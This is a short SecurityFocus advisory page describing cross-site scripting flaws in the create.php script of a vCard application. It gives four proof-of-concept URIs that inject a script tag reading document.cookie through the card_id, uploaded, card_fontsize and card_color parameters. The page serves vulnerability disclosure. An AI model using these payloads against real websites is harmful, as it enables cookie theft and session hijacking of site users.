Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

vCard Create.PHP Multiple Cross-Site Scripting Vulnerabilities


This issue can be exploited through a web client.

The following proof-of-concept URIs are available:
http://www.example.com/vcard/create.php?card_id='><script>alert(document.cookie)</script>

http://www.example.com/vcard/create.php?uploaded='><script>alert(document.cookie)</script>

http://www.example.com/vcard/create.php?card_fontsize='><script>alert(document.cookie)</script>

http://www.example.com/vcard/create.php?card_color='><script>alert(document.cookie)</script>







 

Privacy Statement
Copyright 2009, SecurityFocus